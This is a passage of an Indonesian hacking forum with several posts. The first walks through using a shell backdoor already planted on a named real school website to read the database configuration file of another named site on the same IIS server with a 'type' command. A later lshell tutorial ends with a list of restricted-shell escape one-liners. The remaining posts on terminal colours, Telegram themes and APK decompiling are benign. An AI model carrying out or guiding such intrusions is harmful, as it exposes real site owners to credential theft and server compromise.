disini saya tidak menjelaskan bagaimana shell backdoor berada di website yang saya jadikan sebagai pembelajaran. 

website yang saya jadikan pembelajaran adalah : http://www.dps-secunderabad.in 
[Image: 5EfewZ5HTjWaAKQddwiKLw.png]

httpdocs adalah kata lain dari htdocs kalau di xampp/lamp lokasi penyimpanan data website yang berupa folder atau file.

disini kita akan melihat suatu file internal yang satu server dengan website yang saya jadikan pembelajaran. 
kita akan scan untuk mengetahui website apa saja yang satu server. 

scan tools online : http://www.yougetsignal.com/tools/web-si...eb-server/  
[Image: 2IGrivplRCSB88uSGQ4eGQ.png]


setelah di scan ada 40 website yang satu server. dan lingkaran merah ada target kita untuk melihat file internalnya. 
oh iya, disini security yang dipakai oleh webserver adalah Microsoft IIS 7.5 yang artinya untuk eksekusi folder berupa pindah directory tidak di ijinkan. 

lanjut ketahap berikut. 
target kita adalah : https://www.brihaspathi.com 
saya akan melihat file internalnya yang berupa file koneksi ke mysql. disni kita bermain feeling. yang umum digunakan untuk menyimpan file koneksi mysql itu berada di folder config atau includes.  kita coba salah satunya untuk memastikan. 
ternyata ada folder includes  
[Image: uCW8E2R9RPqLUBsWh7euZA.png]


kita akan mencari tau nama file koneksinya yang berada di folder includes. yang umum di pake adalah config.php atau configuration.php
[Image: wxobYgKjRhiCosR2Zfm7rQ.png]

saya mencoba dengan nama file config.php pada folder includes, dan ternyata blank, ingat blank dan error beda ya. 
file internal itu tidak bisa di access oleh url, dan hasilnya blank. kalau error artinya nama filenya tidak ada. 
[Image: 5cK2Mr68Q_mR1_4p4QIlZw.png]

berarti bisa disimpulkan bahwa nama file untuk koneksi ke mysql yang berada pada folder includes adalah config.php  
lanjut lagi... 
trik untuk melihat isi file internal dalam file config.php pada windows server. 
code: 

Quote:type C:\Inetpub\vhosts\domain-target.com\httpdocs\includes\config.php
 [Image: FhhGIzSwTJezrSxBbAwhbQ.png]

perhatikan code diatas dengan gambar. jadi disesuaikan saja dengan nama domainnya. 
misalnya seperti target saya : 
Quote:type C:\Inetpub\vhosts\brihaspathi.com\httpdocs\includes\config.php

cara eksekusinya : 
buka console dan jalan perintah ini : 
Quote:type C:\Inetpub\vhosts\site-tagetcom\httpdocs\includes\config.php
[Image: DtctmsgwR86aLC4hgsGvrQ.png]


hasil saya adalah : 
Quote:type C:\Inetpub\vhosts\brihaspathi.com\httpdocs\includes\config.php
[Image: 8yAB3RxSQROA4X7fb_fR6g.png]


Tambahan : 

Quote:ingat untuk eksekusi sebuah file website melalui system tidak memakai / akan tetapi memakai


Pertanyaan : 
Quote:kenapa eksekusi dengan awalan type bukan view 

Jawaban : 
Quote:show karena webserver menggunakan windows server.  coba buka command prompt ( CMD) terus tulis help. 
disitu anda mendapatkan cluenya. clue yang dimana saya jadikan sebagai membuka file internal tersebut. atau bisa lihat gambar dibawah.


[Image: Vm7ZnI38T165ynN2h80rYg.png]


Quote:type yang artinya : Menampilkan isi dari sebuah berkas (dalam bentuk teks) ke dalam standard output.
Referensi : https://id.wikipedia.org/wiki/Perintah_DOS   


Ini hanya sebuah pembelajaran semata. 
semoga bisa menambah wawasan anda. 
jangan lupa like Fanspage : https://www.facebook.com/loading.gov/ 
atau bisa lihat profil kami  : https://3njhuteam.github.io/

Print this item

Rainbow Config bashrc for terminal
Posted by: scriptKiddie - 08-13-2017, 12:02 PM - Forum: Bash - Replies (1)

Assalamualaikum warahmatulahi wabarakatu..
Kembali lagi dengan aku desaigner tertampaaaannn sepanjang sejarah dongeng..

NEXT >>

Quote:Masuk terminal dan ketikan :
Code:
nano .bashrc
ATAU
Code:
gedit .bashrc

Lalu pastekan code di bawah, tepatanya di bawah code fi setelah itu save, Kalau kamu ngak tau cara save silahkan klik ini.


Quote:Jika kamu suka banyak warna :
Code:
if [[ ${EUID} == 0 ]] ; then
PS1='\e[1;31;48;5;234m\u \e[38;5;240mon \e[1;38;5;28;48;5;234m\h \e[38;5;54m\d \@\e[0m\n\e[0;31;48;5;234m[\w] \e[1m\$\e[0m '
else
PS1='\e[1;38;5;56;48;5;234m\u \e[38;5;240mon \e[1;38;5;28;48;5;234m\h \e[38;5;54m\d \@\e[0m\n\e[0;38;5;56;48;5;234m[\w] \e[1m\$\e[0m '
fi
Quote:[Image: u5PROauGRHmnCoveteH2dw.png]

Jika kamu suka design simple :
Code:
PS1='\[\e[0m\]\[\e[48;5;236m\]\[\e[38;5;197m\]\u\[\e[38;5;197m\]@\[\e[38;5;197m\]\h\[\e[38;5;105m\] \[\e[38;5;221m\]\w\[\e[38;5;221m\]\[\e[38;5;105m\]\[\e[0m\]\[\e[38;5;236m\]\342\226\214\342\226\214\342\226\214\[\e[0m\]'
Quote:[Image: ziUY-PTLTlKoLUH3e_vlQA.png]

Jika Suka dengan design Elegan :
Code:
PS1="\[\e[47m\]\[\e[1;30m\]*\[\e[0m\]\[\e[00;36m\][\u]\n\[\e[47m\]\[\e[1;30m\]\#\[\e[0m\]  └── \[\e[0m\]\[\e[0;37m\][\h] \[\e[0m\]\n     └── \[\e[0m\]\[\e[1;33m\]>>\[\e[0m\]
Quote:
[Image: gcstIa_1RF6h1oSYPwVWzg.png]

Oke, mungkin itu aja, kalau kamu punya desain bash terminal yg kerryeenn buangetttt Cool . di taruh di kolom post di bawah ya!!
Ilmu itu di bagi coy!! #eh kalau di bagi hasil akhirnya dikit dong, Tzerah lu deh Tong ... Dodgy

Print this item

Big Grin Cara Cari Curi
Posted by: scriptKiddie - 08-12-2017, 04:30 PM - Forum: Ruby - Replies (2)

yosh whats down guys!! Big Grin Big Grin 

Lu punya teman yg pintar banget design?? Lu iri ?? Lu merasa kalau orng2x, ngak pernah ngerti'in dessainner handal kayak lu ??
Yosh itu namanya gibah, lo harus banyak djikir dan meminta jalan kepada allah swt.. %(Eta Terangkanlah, dump damp dump).

oke kali ini kita bakalan ngerubah hasil design orng dengan ruby, terminal dan jari jari tangan.

Quote:
Telegram Skin Codernate
[Image: ApPFA-wFQTuaQYU0YSPxBw.png]


Nah ayo kita rubah warna merah itu menjadi kuning, Pertama kita cek dulu dulu Heksa collor dari warna merah, ada banyak tools buat nge cek, silahkan cari sendiri Sleepy , Kalau gw sih make plugin firefox. "d70733" Nah udah dapat, kedua buka text editor dan pastekan kode berikut :
Code:
baca = File.expand_path('codernateskin.tdesktop-theme')
salin = File.expand_path('replace.tdesktop-theme')
before = /d70733/
after = 'FFC107'

File.open(baca) do |variabelsatu|
 variabeldua = variabelsatu.read
 variabeldua.gsub!(before, after)
 File.open(salin, "w+") { |f| f.write(variabeldua) }
end

*Sebenarnya Code Di atas cukup copy paste aja, Tapi kalau emang mau memahami alurnya, silahkan baca di bawah :

Quote:Code ini membaca dan mencari file PATH kamu, di mana letaknya??
Code:
baca = File.expand_path('codernateskin.tdesktop-theme')

Quote:Kalau kode ini akan menulis dan menaruh tulisanya di tempat yg kamu tentukan.
Code:
salin = File.expand_path('replace.tdesktop-theme'

* Sebenarnya sama aja ke dua kode dia atas, yg bikin ke daunya beda adalah proses coding di bawah.

Quote:Kalau ini, adalah proses Untuk Membaca dan Menulis  :
Code:
before = /d70733/
after = 'FFC107'

File.open(baca) do |variabelsatu|
 variabeldua = variabelsatu.read
 variabeldua.gsub!(before, after)
 File.open(salin, "w+") { |f| f.write(variabeldua) }
end

Di situ terdapat variabeldua, di mana mengunakan fungsi gsub! yg fungsinya menganti atau me replace nilai before ke after

Code:
variabeldua.gsub!(before, after)

Kalau code ini membuka atau membuat "File.open()", lalu mengambil semua nilai dari variabel dua dan mengantinya "{variabeldua}" melalui statment gsub! di atas :
Code:
File.open(salin, "w+") { |f| f.write(variabeldua) }

Ganti code warna di after, silahkan cek code warna yg ingin di ganti di sini , Kalau aku sih makenya warna kuning "FFC107" ..
Save dengan nama Tzrah antum, kalau aku sih replace Run Di Teminal mu ketikan :
Quote:
Code:
irb[*version] replace.rb
Atau

Code:
irb replace.rb

Dan Setelah ruby selesai menulis lu bakan nemuin file "replace.tdesktop-theme" di diroctry yg telah lu set tadi di variabel salin tinggal lu ganti aja skin telegrammu Cool

Eh bdw koq hasilnya terlihat biasa yah, bahkan lebih buruk dari jelek.. apa emang gw ngak cocok jadi desainer ?? ya udah gw jadi hafiz aja Angel  ..

Quote:
[Image: hIk9kgvJSwaOvxqFqMulwA.png]



*Referency :
http://www.w3mc.com/id/ruby/ruby_regular_expressions.html
https://stackoverflow.com/questions/2777...le-in-ruby
http://rubylearning.com/satishtalim/read...files.html


Print this item

  Limited Shell a.k.a lshell
Posted by: bifi - 08-12-2017, 03:20 PM - Forum: ETC - Replies (2)

Assalamulaikum.. nge-thread lagi nih...
kali ini tentang limited shell a.k.a lshell, nah apa itu lshell?

"lshell is a shell coded in Python, that lets you restrict a user's environment to limited sets of commands, choose to enable/disable any command over SSH (e.g. SCP, SFTP, rsync, etc.), log user's commands, implement timing restriction, and more. "

via : https://github.com/ghantoos/lshell

oke lanjut, installation :

Code:
1. Install from source
       # on Linux:
       python setup.py install --no-compile --install-scripts=/usr/bin/
       # on *BSD:
       python setup.py install --no-compile --install-data=/usr/{pkg,local}/
2. On Debian (or derivatives)
       apt-get install lshell
3.  On RHEL (or derivatives)
       yum install lshell


[Image: Yzj0t10RSC2mqUwb9DDQfg.png]

yup cara penggunaan :

Switch User to LShell dengan command chsh atau change shell, ketik sudo chsh nama_user + enter
Code:
┌─[geek|plankton ~]
└─$ sudo chsh geek
Changing the login shell for geek
Enter the new value, or press ENTER for the default
    Login Shell [/usr/bin/lshel]: /usr/bin/lshell

atau opsi lainnya kita bisa menambahkan user baru yang shell defaultnya menggunakan lshell, nih commandnya :
Code:
$ sudo adduser --shell /usr/bin/lshell nama_user


Configure LShell :
file konfigurasi lshell ada pada directory /etc/lshell.conf
nih isinya :
Code:
┌─[geek|plankton ~]
└─$ cat /etc/lshell.conf
# lshell.py configuration file
#
# $Id: lshell.conf,v 1.27 2010-10-18 19:05:17 ghantoos Exp $

[global]
##  log directory (default /var/log/lshell/ )
logpath         : /var/log/lshell/
##  set log level to 0, 1, 2, 3 or 4  (0: no logs, 1: least verbose,
##                                                 4: log all commands)
loglevel        : 2
##  configure log file name (default is %u i.e. username.log)
#logfilename     : %y%m%d-%u
#logfilename     : syslog

##  in case you are using syslog, you can choose your logname
#syslogname      : myapp

## include a directory containing multiple configuration files. These files
## can only contain default/user/group configuration. The global configuration will
## only be loaded from the default configuration file.
## e.g. splitting users into separate files
#include_dir     : /etc/lshell.d/*.conf

[default]
##  a list of the allowed commands or 'all' to allow all commands in user's PATH
allowed         : ['ls','echo','cd','ll']

##  a list of forbidden character or commands -- deny vim, as it allows to escape lshell
forbidden       : [';', '&', '|','`','>','<', '$(', '${']

##  a list of allowed command to use with sudo(8)
##  if set to ´all', all the 'allowed' commands will be accessible through sudo(8)
#sudo_commands   : ['ls', 'more']

##  number of warnings when user enters a forbidden value before getting
##  exited from lshell, set to -1 to disable.
warning_counter : 2

##  command aliases list (similar to bash’s alias directive)
aliases         : {'ll':'ls -l', 'vim':'rvim'}

##  introduction text to print (when entering lshell)
#intro           : "== My personal intro ==\nWelcome to lshell\nType '?' or 'help' to get the list of allowed commands"

##  configure your promt using %u or %h (default: username)
#prompt          : "%u@%h"

##  set sort prompt current directory update (default: 0)
#prompt_short    : 0

##  a value in seconds for the session timer
#timer           : 5

##  list of path to restrict the user "geographicaly"
#path            : ['/home/bla/','/etc']

##  set the home folder of your user. If not specified the home_path is set to
##  the $HOME environment variable
#home_path       : '/home/bla/'

##  update the environment variable $PATH of the user
#env_path        : ':/usr/local/bin:/usr/sbin'

##  a list of path; all executable files inside these path will be allowed
#allowed_cmd_path: ['/home/bla/bin','/home/bla/stuff/libexec']

##  add environment variables
#env_vars        : {'foo':1, 'bar':'helloworld'}

##  allow or forbid the use of scp (set to 1 or 0)
#scp             : 1

## forbid scp upload
#scp_upload       : 0

## forbid scp download
#scp_download     : 0

##  allow of forbid the use of sftp (set to 1 or 0)
##  this option will not work if you are using OpenSSH's internal-sftp service
#sftp            : 1

##  list of command allowed to execute over ssh (e.g. rsync, rdiff-backup, etc.)
#overssh         : ['ls', 'rsync']

##  logging strictness. If set to 1, any unknown command is considered as
##  forbidden, and user's warning counter is decreased. If set to 0, command is
##  considered as unknown, and user is only warned (i.e. *** unknown synthax)
strict          : 0

##  force files sent through scp to a specific directory
#scpforce        : '/home/bla/uploads/'

##  history file maximum size
#history_size     : 100

##  set history file name (default is /home/%u/.lhistory)
#history_file     : "/home/%u/.lshell_history"

##  define the script to run at user login
#login_script     : "/path/to/myscript.sh"

Basic Configuration:


[default] Settingan untuk menetapkan nilai default yang diterapkan pada semua pengguna dan grup. Pengaturan bagian ini dapat diganti dengan pengaturan khusus pengguna dan kelompok.
Code:
[default]
##  a list of the allowed commands or 'all' to allow all commands in user's PATH
allowed         : ['ls','echo','cd','ll']

##  a list of forbidden character or commands -- deny vim, as it allows to escape lshell
forbidden       : [';', '&', '|','`','>','<', '$(', '${']

------skip------

note : dibagian allowed kita bisa menambahkan command yang (bisa) digunakan. jadi hanya perintah yang didaftarkan saja yang bisa digunakan, yang tidak ditambahkan tidak dapat digunakan.

[Image: pswPHDzkR-GkIUtZQT2Bcw.png]

penampakan :
https://asciinema.org/a/ZqbniPbF6ym33uQ7PbnCIIxY8

yarp sebenarnya masih banyak fungsi lshell yang lain, silahkan di explore lebih jauh lagi....
btw kita bisa memanfaatkan lshell untuk default login shell di ssh pada beberapa kondisi seperti untuk soal-soal remote easy CTF dan untuk nge-troll user-user nakal.. asal jangan di troll balik saja... tinggal pakai perintah chsh saja untuk user yang di inginkan...


BONUS :

Bypassing Shell :

Code:
python -c 'import pty; pty.spawn("/bin/sh")'

echo os.system('/bin/bash')

perl —e 'exec "/bin/sh";'

perl: exec "/bin/sh";

ruby: exec "/bin/sh"

lua: os.execute('/bin/sh')

-----------------------------

(From within IRB)

exec "/bin/sh"

-----------------------------
(From within vi)

:!bash

-----------------------------
(From within vi)

:set shell=/bin/bash:shell

-----------------------------
(From within nmap)

!sh

semoga aja settingan lshell atau other shell bisa di spawn.. :p


Referensi :
https://packages.debian.org/wheezy/lshell
https://tecadmin.net/how-to-limit-user-a...ted-shell/
https://www.aldeid.com/wiki/Lshell
https://netsec.ws/?p=337

Print this item

  [Share] Merubah theme Telegram di Desktop
Posted by: JLCNate - 08-12-2017, 08:39 AM - Forum: Other - No Replies

Kamu suka pakai aplikasi chatting mobile di komputer kamu? Kamu pasti sudah tidak asing dengan Telegram. Iya, aplikasi chatting yang pada beberapa waktu lalu di blokir oleh pemerintah kini sudah bisa kita manfaatkan kembali. Pada versi v 1.1.9, kamu dapat merubah tampilannya menjadi lebih menarik dan nyaman untuk digunakan.

Pertama download filenya disini https://drive.google.com/open?id=0B7jvEJ...jNCVTdvTlk

Terdapat 2 buah file disana:

Quote:[Image: qSmm418kQR_NB1SVDL-8tg.png]


Buka aplikasi Telegram Desktop kamu dan klik di bagian list dan setting
Quote:[Image: mwXWYLHgRbSKXvf7DxR3kA.png]


Scroll ke bagian Chat background
Quote:[Image: rBZBgE01TUqRqSicWLWMDA.png]


Pilih "Choose from file" lalu pilih file "cnate.tdesktop-theme" yang sudah di download tadi.
Quote:[Image: DDne_F1_Ts68IPba18pMIA.png]


Maka akan tampil seperti ini
Quote:[Image: 3gBExGU8T4WQ7kNIs8dEdA.png]


Tekan "KEEP CHANGES" maka theme yang diinginkan sudah berhasil diterapkan.

Selanjutnya adalah backgroud chat, klik choose from file lalu pilih file gambar yang ada didalam folder tadi.

Print this item

Bug Bongkar BOOMBAYA
Posted by: scriptKiddie - 08-12-2017, 12:51 AM - Forum: Android - No Replies

HALLO!! Sahabat Tisu, Kali ini we singkat aja, karna we belum bobo, Tread yg satu ini adalah bagaimana cara meng decompile aplikasi android yg sudah ter debug atau tercompaile..

Bahan Bahan :

Quote:apktarget
dex2jar
JD-GUI
Setelah Semua bahan tersedia install dex2jar dan JD-GUI
Lalu masuk ke directory tempat tersimpanya aplikasi android.apk yg mau di Decompile dan ketikan :

Quote:d2j-dex2jar android.apk
Nanti ketemu sebuah file dengan ekstension android.jar , Nah Sekarang Giliran JD-GUI ,
Buka JD-GUI mu di menu aplication (Bukan Lewat Terminal, namanya juga GUI), lalu cari file jar yg udah di ekstrack oleh dex2jar tadi.
Quote:
[Image: mqo29C5jRy_TWnHWUACU3Q.png]
Gi mana Singkatkan ?? Ya Udah W tidur dulu ??

&&Open Pembahasan lanjutanya di bawah, silahkan tertarakan pertanyaan, atau kelanjutan penemuanmu saat meng decompile apk

Print this item